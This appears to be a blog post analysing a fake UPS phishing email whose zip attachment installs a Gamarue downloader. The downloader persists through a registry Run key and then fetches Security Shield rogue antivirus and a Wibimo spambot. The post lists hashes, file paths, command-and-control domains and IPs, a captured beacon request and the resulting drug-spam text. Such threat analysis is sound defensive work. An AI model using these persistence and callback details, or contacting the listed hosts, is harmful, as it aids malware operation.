UPS notify!

Subject: UPS notify
Attachment: parcel information.zip
From: PameliaBaffuto@ups.com

UPS notify
The email contained an attachment, parcel information.zip. Within this zip file was an executable with the following properties:

Name: Parcel information.exe
MD5: 0eadfb37c6664ae671d50787bc6b9e28
Size: 47,616 bytes

This payload is identified as a Gamarue downloader, a bot-controllerd worm. It injects itself into a new svchost.exe process. It then makes a self-copy at:
C:\WINDOWS\system32\wuauclt.exe

It adds a registry entry to ensure that the executable runs with each system restart:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
61309 – “C:\WINDOWS\system32\wuauclt.exe”

It then queries A records from Google’s public DNS (at IP address 8.8.4.4) for the domain napasaran[.]ru. This domain is hosted at IP addresses 89.73.38.241, 122.226.120.75, and 46.4.245.38.

The following network traffic is then observed:

POST /and/image.php HTTP/1.1
Host: napasaran.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Connection: close

7fZcUO9fCz1CU4gLIDPydspxXvW8fwi9fj19n/y4Ejx0etSTslkiXgbBYnPNFDZjW/a3dF2ZHHYV88BiixGbWA==

The infected computer then downloads and installs file napasaran.ru /test.exe. This is Security Shield rogue AV with the following properties:

MD5: 6ebb20543e371d72e807a62c897685d5
Size: 349,696 bytes
Timestamp: 2011:10:25 21:34:24+02:00

Security Shield AV

Next, it downloads apartmentsincorfu[.]gr /888.exe. This domain is hosted at 62.1.213.166.
This is a Wibimo spambot with the following properties:

MD5: 4162b8bceb3f4ceb97519f92e54c7f4c
Size: 27,136 bytes
Timestamp: 2011:11:21 11:45:32+01:00

It is installed as:

C:\WINDOWS\system32\ItpurnIfsoyy.dll
MD5: 03142b3993c6f8c530eb2a943173a20b
Size: 13,824 bytes

It connects to a C&C at grabsfakus[.]com:1001. This domain is hosted at 3 IP addresses: 78.159.111.122, 188.72.250.60 and 46.165.199.197. This domain was registered by andpushon@hotmail.com. Other domains registered by same mail ID:

– hydroliets.com
– lassogol.com
– aldrorist.com
– vizits-track.com

The spambot immediately began its spam campaign of “Best quality drugs” as shown below:

Subject: BUY NOW VIAGRA CIALIS !!!

USPS – Fast Delivery Shipping 1-4 day USA
Best quality drugs
Fast Shipping USA
Professional packaging
100% guarantee on delivery
Best prices in the market
Discounts for returning customers
FDA approved productas
35000+ satisfied customers

http://fauh.doctorpou.ru

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: